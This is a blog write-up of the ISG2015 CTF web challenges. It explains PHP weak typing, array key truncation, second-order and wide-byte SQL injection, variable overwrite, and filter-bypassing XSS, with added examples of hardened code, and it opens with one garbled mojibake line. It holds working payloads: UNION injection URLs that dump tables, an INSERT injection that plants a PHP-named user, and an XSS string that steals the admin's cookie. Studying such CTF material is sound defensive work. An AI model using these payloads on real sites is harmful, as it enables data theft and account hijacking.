LoRexxar's Blog

ISG2015_writeup

2015/11/17

鍓嶆鏃堕棿涓鐩村繖浜庡悇绉嶄簨锛屾渶杩戝垰濂芥湁鏃堕棿锛屾墍浠ヨ繕鏄荤粨涓媔sg鐨剋eb棰樼洰锛岄伩鍏嶄互鍚庡繕璁扳

WEB

WEB 50 collision (PHP weak typing)

Not much to say here; I had run into this kind of challenge before. Because of PHP's weak type comparison, if the md5 hashes of both submitted values start with 0e, the comparison becomes 0 == 0 and the check is bypassed.

md5('240610708') is 0e462097431906509019562988736854.

md5('QNKCDZO') is 0e830400451993494058024219903391.

web 150 array (array key truncated at the upper bound during comparison)

This exploits the bug where PHP truncates array keys during array comparison. Submitting user[4294967296] bypasses the condition. What remains is brute-forcing the timestamp.
Two relevant links:

https://bugs.php.net/bug.php?id=69892
http://www.sektioneins.de/blog/15-07-31-php_challenge_2015.html

webdroid 200 (PHP weak type comparison)

The challenge was packaged inside an apk, so when I was working on it I never thought to open it up and look, but it is actually simple. Inside the apk you can find an endpoint: the submitted secret is compared with the one on the server, and the request is sent as JSON. Normally the submitted characters would be treated as a string, but here the body goes through json_decode, which restores the original data types, so PHP's weak type comparison can be exploited. The part of the official PHP documentation on weak comparison reads as follows:
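The loose comparison behind both the WEB 50 and webdroid 200 challenges, beside the strict check that closes it, as an added example that is not part of the original writeup (the server-side secret and the JSON body are constructed sample values):

```php
<?php
// WEB 50: both md5 hex digests have the form "0e<digits>", which PHP's ==
// treats as numeric strings equal to 0 * 10^n, so the two hashes compare equal.
$a = md5('240610708');   // 0e462097431906509019562988736854
$b = md5('QNKCDZO');     // 0e830400451993494058024219903391
var_dump($a == $b);            // bool(true)  - loose comparison, check bypassed
var_dump($a === $b);           // bool(false) - strict comparison, check holds
var_dump(hash_equals($a, $b)); // bool(false), and constant-time

// webdroid 200: the request body is JSON, so json_decode() restores native
// types and a boolean can be compared loosely against the server-side string.
$server_secret = 'S3cr3t-Value';  // constructed sample value
$body = '{"secret": true}';       // constructed: client sends a boolean, not a string
$data = json_decode($body, true);
var_dump($data['secret'] == $server_secret);  // bool(true): true == non-empty string
var_dump($data['secret'] === $server_secret); // bool(false)

// Hardened check: require a string and compare it strictly.
function secret_ok(array $data, string $expected): bool {
    return isset($data['secret'])
        && is_string($data['secret'])
        && hash_equals($expected, $data['secret']);
}
var_dump(secret_ok($data, $server_secret)); // bool(false)
```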

injection (second-order injection)

Part of the source code was given as follows:

```php
if($_GET['search']){
    // $username comes from the database via the session, not from the request
    $username = $_SESSION['username'];
    $title = mysql_real_escape_string($_GET['search']);
    $sql = "select * from posts where username='$username' and title like '$title'";
    $result = mysql_query($sql);
}
```

Reading the writeups of more experienced players here taught me a different style of injection; a very neat bypass is used.

When searching, $_SESSION['username'] is interpolated directly into the statement, and $_SESSION['username'] comes from the database. The program escapes twice, so a direct second-order injection is not possible. Consider bypassing this through truncation at the database column length.

First fuzz out the length of the username column in the database, then make the last character a \. After PHP's escaping it becomes \\, but because of the column length limit only a single \ survives when the value is inserted into the database, so when it is selected out again it escapes the closing single quote.

After registering and logging in, search out the flag directly:

```
index.php?search=%20union%20select%201,2,(select%20flag%20from%20flag),4%23
```
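A simulation of the column-length truncation described above and the prepared-statement fix, as an added example that is not part of the original writeup; it assumes a VARCHAR(20) username column (the real length had to be fuzzed) and models MySQL's non-strict silent truncation with substr():

```php
<?php
const USERNAME_MAXLEN = 20; // assumed column width, stand-in for the fuzzed value

// Models INSERT into a VARCHAR(20) column: the value is escaped first, then
// MySQL (without strict mode) silently drops the bytes past the column length.
function store_username(string $input): string {
    $escaped = addslashes($input);               // what the app does before INSERT
    return substr($escaped, 0, USERNAME_MAXLEN); // what actually lands in the DB
}

// 19 filler characters plus a trailing backslash: escaping doubles it to
// "\\" (21 bytes) and truncation keeps only the first backslash.
$username = str_repeat('a', 19) . '\\';
$stored   = store_username($username);
var_dump($stored); // string(20) "aaaaaaaaaaaaaaaaaaa\"

// Later the stored value is read back into $_SESSION['username'] and
// interpolated unescaped; the lone backslash consumes the closing quote, so
// the `search` value, escaped or not, now sits outside any string literal.
$search = ' union select 1,2,3,4#';
$sql = "select * from posts where username='$stored' and title like '$search'";
echo $sql, "\n";
// select * from posts where username='aaaaaaaaaaaaaaaaaaa\' and title like ' union select 1,2,3,4#'

// Hardened: reject input longer than the column before it is ever escaped,
// and bind parameters so stored values are never interpolated at all.
function safe_search(PDO $db, string $username, string $search): PDOStatement {
    if (strlen($username) > USERNAME_MAXLEN) {
        throw new InvalidArgumentException('username too long');
    }
    $stmt = $db->prepare('select * from posts where username = ? and title like ?');
    $stmt->execute([$username, $search]);
    return $stmt;
}
```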

shell 250 (special username leads to a file upload vulnerability)

Uploaded files are renamed, and the new filename is derived from the registered username, but the username is checked against a regex that disallows special characters. At the time that was all I found; only later, reading the writeup, did I learn:

There is an injection in the email field at registration. With an INSERT injection you can insert several rows at once and create an extra user named salt.php; Apache's parsing behaviour then gives you the flag.

```
md5@salt.com','1'),('salt.php',md5('salt'),'2','2')#
```

xssme 500 (multiple rounds of URL encoding to bypass special-character filtering)

The challenge was stated as follows:
1. Please test with the latest version of Chrome.
2. The final payload takes the form of a URL; the payload triggers on the site itself, so please don't send it to my mailbox.
3. admin will only click on-site URLs you send; anything that is not a URL will not be looked at. Also, admin cannot reach external servers.

After opening the challenge and testing a little, I found that most of the useful characters were filtered, and script and on were filtered as well. Being still green, I instinctively assumed changing case would not help, so I never tried it. The challenge actually has quite a few more traps; it is not just a matter of popping an alert to get the flag:
1. script is replaced, so naturally scscriptript bypasses it, and this also happens to bypass Chrome's built-in XSS filter.
2. CSP is enabled and only allows scripts from the site itself. Use the reflection point to construct the XSS payload, and the extra error output has to be commented out.
3. URL encoding. Because one page gets nested and referenced several times, you have to work out exactly which parts of the payload need encoding and which do not.
4. The server cannot reach the internet, so the approach is to have admin send a message to you carrying the sensitive information obtained through the XSS.
5. The payload has to be sent to admin, at which point it passes through another round of script replacement.

So putting it all together, the payload is:

```
http://202.120.7.136:8888/html/index.php?action=send&content=%3Cscrscriscriptptipt%20src%3D%22http%3A//202.120.7.136:8888/html/index.php%3Faction%3Dsend%26to=*/%26content%3Dwindow.location%253D%2522http%253A//202.120.7.136:8888/html/index.php%253Faction%253Dsend%2526content%253D%2522%252Bdocument.cookie%252B%2522%2526to%253Dmd5_salt%2522/*%22%3E%3C/scscrscriptiptript%3E
```

That is hard to read; URL-decoding it once makes the structure visible:

```html
<scrscriscriptptptipt src="http://202.120.7.136:8888/html/index.php?action=send&to=*/&content=window.location%3D%22http%3A//202.120.7.136:8888/html/index.php%3Faction%3Dsend%26content%3D%22%2Bdocument.cookie%2B%22%26to%3Dmd5_salt%22/*"></scscrscriptiptript>
```

After the filter has stripped its matches:

```html
<script src="http://202.120.7.136:8888/html/index.php?action=send&to=*/&content=window.location%3D%22http%3A//202.120.7.136:8888/html/index.php%3Faction%3Dsend%26content%3D%22%2Bdocument.cookie%2B%22%26to%3Dmd5_salt%22/*"></script>
```

When admin views it, the browser executes the following and sends the message:

```javascript
window.location="http://202.120.7.136:8888/html/index.php?action=send&content="+document.cookie+"&to=md5_salt"
```

This yields admin's flag.
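The single-pass keyword filter that the scscriptript trick defeats, beside an output-encoding fix, as an added example that is not part of the original writeup; the filter body is an assumption modelled on the behaviour described above (the challenge's own filter code was not shown), and the src URL is a constructed placeholder:

```php
<?php
// Blacklist filter as the challenge appears to use it: one pass of removal.
// Deleting "script" from "scscriptript" reassembles a fresh "script" around
// the hole, so the filtered output is exactly what the filter meant to block.
function naive_filter(string $content): string {
    return str_replace(['script', 'on'], '', $content);
}

// Encode for the HTML context instead of blacklisting tokens: the browser then
// renders "<script>" as literal text and never parses it as a tag.
function safe_render(string $content): string {
    return htmlspecialchars($content, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$payload = '<scscriptript src="http://example.invalid/x.js"></scscriptript>';
echo naive_filter($payload), "\n";
// <script src="http://example.invalid/x.js"></script>   - filter bypassed
echo safe_render($payload), "\n";
// &lt;scscriptript src=&quot;http://example.invalid/x.js&quot;&gt;&lt;/scscriptript&gt;
```

Looping the removal until the string stops changing would catch this particular nesting, but it is still a blacklist; context-aware encoding on output is what removes the class of bug.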

Fruit Store (200) (wide-byte injection)

Not a hard challenge; once you find the injection point it is easy to dump the flag.
The main trick is the %df wide byte; I heard that even throwing it straight into sqlmap dumps it:
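Why the %df prefix lets the quote survive escaping when the connection charset is GBK, and the fix, as an added example that is not part of the original writeup; the input bytes are constructed, and the column name `name` and the PDO connection details are assumptions (the challenge only exposed the `fruit` parameter):

```php
<?php
$fruit   = "flag\xdf'";          // %df%27 from the URL, decoded
$escaped = addslashes($fruit);   // escaper inserts \ (0x5c) before the quote
echo bin2hex($escaped), "\n";    // 666c6167df5c27

// Under GBK, 0xDF 0x5C is one valid two-byte character, so the backslash is
// swallowed as a trail byte and the quote that follows is left unescaped.
echo mb_strlen($escaped, 'GBK'), "\n";                 // 6: f l a g <df5c> '
echo bin2hex(mb_substr($escaped, 5, 1, 'GBK')), "\n";  // 27: a bare quote

// The query the server builds therefore closes its string literal early:
$sql = "select * from fruit where name='$escaped'";
echo $sql, "\n"; // select * from fruit where name='flag<df5c>''

// Fix: declare the connection charset to the driver (not via SET NAMES, which
// the escaper does not see) and bind values instead of interpolating them.
function safe_fruit_lookup(string $fruit): PDOStatement {
    $db = new PDO('mysql:host=127.0.0.1;dbname=shop;charset=utf8mb4', 'user', 'pass');
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // real server-side binding
    $stmt = $db->prepare('select * from fruit where name = ?');
    $stmt->execute([$fruit]);
    return $stmt;
}
```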

First dump the table names:

```
http://202.120.7.140:8888/try.php?fruit=flag%df%27+and+1=2+union+select+group_concat(distinct+table_name),2+from+information_schema.tables+where+table_schema=database()%23
```

Result: fruit,tell_me_who_u_are

Then dump the column names:

```
flag%df%27+and+1=2+union+select+group_concat(distinct+column_name),2+from+information_schema.columns+where+table_name=0x74656c6c5f6d655f77686f5f755f617265%23
```

Result: flag

Finally read it out:

```
flag%df%27+and+1=2+union+select+group_concat(flag),2+from+tell_me_who_u_are%23
```

get!

SuperAdmin (250) (%0a to get past registration, variable overwrite)


On the registration page I tried registering admin followed by several %0a, logged in, and got past the admin check. That gave a hint that only local users receive debug information, so I set X-Forwarded-For to 127.0.0.1 and got the following debug output:

```php
// Recursively addslashes() every request value when magic quotes are off
function runmagicquotes(&$svar){
    if(!get_magic_quotes_gpc()){
        if( is_array($svar) ){
            foreach($svar as $k => $v)
                $svar[$k] = runmagicquotes($v);
        }
        else{
            $svar = addslashes($svar);
        }
    }
    return $svar;
}
...... ......
register($username, $password, $email, $is_super);
```

There is a global variable overwrite problem: re-register an account named admin followed by several %0a, add an is_super=1 parameter, log in, and get the flag.
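The register-globals style import that the debug output implies, which lets a request parameter overwrite $is_super, beside a whitelisted version, as an added example that is not part of the original writeup; the import loop and the request array are assumptions (the challenge only showed the quoting function and the register() call):

```php
<?php
// Same shape as the challenge's quoting helper, minus the magic-quotes check.
function runmagicquotes(&$svar) {
    if (is_array($svar)) {
        foreach ($svar as $k => $v) {
            $svar[$k] = runmagicquotes($v);
        }
    } else {
        $svar = addslashes($svar);
    }
    return $svar;
}

// Vulnerable (assumed pattern): every request key becomes a local variable,
// so a client-supplied is_super replaces the default set just above the loop.
function import_request_vulnerable(array $request): array {
    $is_super = 0;
    $username = '';
    foreach ($request as $k => $v) {
        $$k = runmagicquotes($v);        // ?is_super=1 overwrites $is_super
    }
    return compact('username', 'is_super');
}

// Hardened: read only the expected keys; privilege flags never come from the request.
function import_request_safe(array $request): array {
    return [
        'username' => addslashes((string)($request['username'] ?? '')),
        'is_super' => 0,
    ];
}

$req = ['username' => "admin\n\n", 'is_super' => '1']; // constructed request
var_dump(import_request_vulnerable($req)['is_super']); // string(1) "1"
var_dump(import_request_safe($req)['is_super']);       // int(0)
```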

That is about it for the web challenges. Although my result this time was not good, I still saw plenty of things I had never seen before, which was satisfying in itself; the only pity is finishing 102nd and missing the certificate for the top 100. Oh well, who cares~
